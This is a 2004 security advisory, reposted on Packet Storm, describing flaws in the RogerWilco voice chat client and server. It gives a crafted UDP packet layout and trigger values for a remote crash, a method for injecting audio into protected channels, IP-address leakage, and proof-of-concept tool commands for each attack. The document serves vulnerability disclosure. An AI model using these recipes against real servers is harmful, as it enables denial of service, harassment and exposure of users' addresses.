what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rogerwilco2.txt

rogerwilco2.txt
Posted Mar 31, 2004
Authored by Luigi Auriemma | Site aluigi.altervista.org

RogerWilco versions 1.4.1.6 and below and RogerWilco Base Station versions 0.30a suffer from multiple bugs. From being crashed with a malformed UDP packet to spoofing 'voice' traffic when not even being connected to a channel, quite a few amusing problems are listed.

tags | advisory, udp, spoof
SHA-256 | 22ab3fb2653158c6541bf495cfa5519f2bf1f7f1d2a4c897d0324b8762076abc

rogerwilco2.txt

Change Mirror Download

#######################################################################

Luigi Auriemma

Application: RogerWilco
https://rogerwilco.gamespy.com
Versions: - RogerWilco <= 1.4.1.6
- RogerWilco Base Station <= 0.30a
Platforms: Windows, MacOS, Linux and FreeBSD
Bugs: A] Crash with malformed UDP packet
B] "Voices from the deep" bug
C] Privacy problems
D] Annoying attacks
Risk: (not needed)
Exploitation: remote, versus server and client (channel broadcast)
Date: 31 Mar 2004
Author: Luigi Auriemma
e-mail: aluigi@altervista.org
web: https://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bugs summary
3) Bugs details
4) The Code
5) The Code examples
6) Fix


#######################################################################

===============
1) Introduction
===============


RogerWilco is a voice chat application running on Windows and MacOS
but are also availables dedicated servers (called "Base Stations") for
Windows, Linux and FreeBSD x86.
The program is distribuited by Gamespy, is no longer supported and is
affected by some critical security bugs but is also still used by a lot
of people.

RogerWilco is full of security bugs very interesting to study and this
time I want to talk about some types of bugs not caused by programming
errors but by how the software has been designed.

To be more comprehensible this advisory/paper is divided into 2
sections, one with a quick summary of the vulnerabilities and another
with all the details.


#######################################################################

===============
2) Bugs summary
===============


----------------------------------
A] Crash with malformed UDP packet
----------------------------------

A special crafted UDP packet (big and with some big values in it) sent
to the UDP audio port of RogerWilco will immediately crash the server
or the client.


-----------------------------
B] "Voices from the deep" bug
-----------------------------

Is possible for anyone to talk into a channel without being into it but
simply sending the audio stream directly to the server or to a specific
client inside the same channel.
The audio stream will be transmitted to anyone in the channel or also
only to a specific user or group of users.
Only trasmission is possible, not reception.


-------------------
C] Privacy problems
-------------------

Both client and server report a lot of informations, the server for
example shows all the IP addresses and port used by clients and clients
show the server IP to which they are connected.


-------------------
D] Annoying attacks
-------------------

The dedicated server shows the message "nothing read from recv" when
someone connects to its port 18009 and disconnects without sending
data.
Making a lot of empty connections the server's administrator will be
flooded by these messages.

The GUI application refreshs its entire window when a user enters,
exits or changes his nickname. If someone changes his nickname
infinitely times all the users in the same channel will have some bad
effects as the impossibility to take the control of their application.


#######################################################################

===============
3) Bugs details
===============


----------------------------------
A] Crash with malformed UDP packet
----------------------------------

RogerWilco uses an UDP port for the transmission and the reception of
the audio stream.
Each UDP packet is composed by a first byte that is ever 0x0f and then
by the name of the channel to which trasmitting the sound followed by
a NULL byte.
Then are located the informations about what user or users must receive
the audio stream and also if must be retransmitted.

The users who must receive the data (forwarded by the server) are
listed using fields of 16 bits that contain their IDs (each user
receives an ID assigned by the server when he joins).
The last piece of the packet is the audio data block.

A quick example of audio packet is the following:

"\x0f" // ever 0x0f
"channel\0" // name of the channel in which trasmitting the stream
"\xff\xff" // this data "should" represent the type of transmission
"\x7f" // as above, I don't have details (not important here)
"\x00" // I don't know its usage (not important here)
"\x01" // number of target IDs (server excluded), max 127
"\x00\x00" // ID 0, it is the server's ID (who must receive the data)
"\x00\x01" // ID 1, the user with ID 1 (who must receive the data)
"data..." // audio stream

Now, RogerWilco manages the packet in the following mode: the program
arrives to read until the "number of target IDs" and then starts a loop
to read all the 16 bits fields after it containing the target IDs.
The following is the piece of code doing that (from RWNET.DLL):

:100050BF 668B06 mov ax, word ptr [esi]
:100050C2 50 push eax
:100050C3 E81C1D0000 Call 10006DE4 (WSOCK32.ntohs)
:100050C8 8B4D58 mov ecx, dword ptr [ebp+58]
:100050CB 83C602 add esi, 00000002
:100050CE 66890479 mov word ptr [ecx+2*edi], ax
:100050D2 8B442418 mov eax, dword ptr [esp+18]
:100050D6 47 inc edi
:100050D7 3BF8 cmp edi, eax
:100050D9 7CE4 jl 100050BF

If an attacker sends a big channel name (as 924 chars) specifying the
presence of 127 IDs BUT without adding them to the packet, the program
will read from a non allocated memory zone (ESI pointer).

In the dedicated server the crash happens at offset 100050BF of
RWNET.DLL while in the GUI program it happens at offset 1000544B of
NETWORK.DLL (the vulnerable instructions are the same).


-----------------------------
B] "Voices from the deep" bug
-----------------------------

RogerWilco is composed by a TCP and an UDP section, the first is used
to manage users, nicknames, IDs, accesses and other things while the
second is only used for the audio stream.

The nice fact is that is not needed to join a channel (TCP section) to
transmit the own audio but is only needed to send the UDP stream to the
server that will manage it normally.

This "structure" lets anyone to talk anonymously into any server's
channel without being stopped and without limits because limits are
managed in the TCP section, so for example we can put our voice in a
server also if it is password protected.

The only 2 small and almost unexistent limits I have found are that the
data can be only sent and not received and that is needed to know the
IDs of the users inside the channel to let the stream to reach them.

RogerWilco supports a maximum of 127 IDs for each sound stream (look
the explanation of the previous bug) so if is impossible to enter in
the channel of the server to get all the real user IDs (for example
because it is protected by an unknown passowrd), exists ever the
possibility to use the IDs from 0 to 127 because IDs are sequentials
and are ever reused so I "think" is rare to find a server with users
having IDs over 127.


-------------------
C] Privacy problems
-------------------

When an user enters in a channel, the server immediately sends to him
all the list of users inside the channel with their IDs (tag 0x0a0f),
nicknames (tag 0x0c0f) and moreover their source IP addresses and ports
(tag 0x0f0f).

The same happens if we try to enter in a client (exactly as we do with
servers because the UDP and TCP ports are EVER opened) in fact we will
receive the tag 0x010f showing the IP of the server in which the user
is talking.

The result is that if an user is talking in a channel and don't like
what another user is saying, he can easily cause damage exactly to him.


-------------------
D] Annoying attacks
-------------------

There is not too much to say about these so called "attacks", in fact
the message "nothing read from recv" is shown into the dedicated server
console when a client connects to the port 18009 and disconnects
without sending data.
The port 18009 is something like a mini web server showing the current
channels hosted on the dedicated server and some other informations.

Instead more interesting is the problem of the GUI program, in fact the
tag 0x100f is used just by the users to change their nicknames while
they are talking in a channel.
Changing the own nickname continually will create some visualization
effects to the other users because the window of the program will be
recreated each time and the users cannot control the program during
this boring refresh.


#######################################################################

===========
4) The Code
===========


"Testing tool for RogerWilco 0.4" released:

https://aluigi.altervista.org/poc/wilco.zip


#######################################################################

====================
5) The Code examples
====================


The following are some quick and simple examples of how to test all the
problems I have described in this and in the previouses advisories for
RogerWilco using my proof-of-concept.
"server" and "client" are the IP or the hostname of the host we wanna
test (as localhost):

----------------------------------
A] Crash with malformed UDP packet
----------------------------------

wilco -10 server
or
wilco -10 -p 3783 server


-----------------------------
B] "Voices from the deep" bug
-----------------------------

wilco -9 server

then we must connect our RogerWilco client to localhost:3780/CHANNEL
where CHANNEL is the channel in which we wanna transmit our sound.
Then we simply need to use our client normally (for example hitting F12
to talk).


wilco -8 -c mychannel server

this option will transmit a bad and annoying noise sound to all the
users into "mychannel".


-------------------
C] Privacy problems
-------------------


wilco server
or
wilco client
or
wilco -p 3783 server
or
wilco -p 3783 -c mychannel -n yournickname server

The tool will show all the informations received from the server or the
client.

We can also use the proxy option that can be used with a RogerWilco
client to get the informations in real-time:

wilco -x server


-------------------
D] Annoying attacks
-------------------


wilco -6 -p 3783 server
and
wilco -7 server
or
wilco -7 client


#######################################################################

======
6) Fix
======


RogerWilco is no longer supported.


#######################################################################



---
Luigi Auriemma
https://aluigi.altervista.org
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close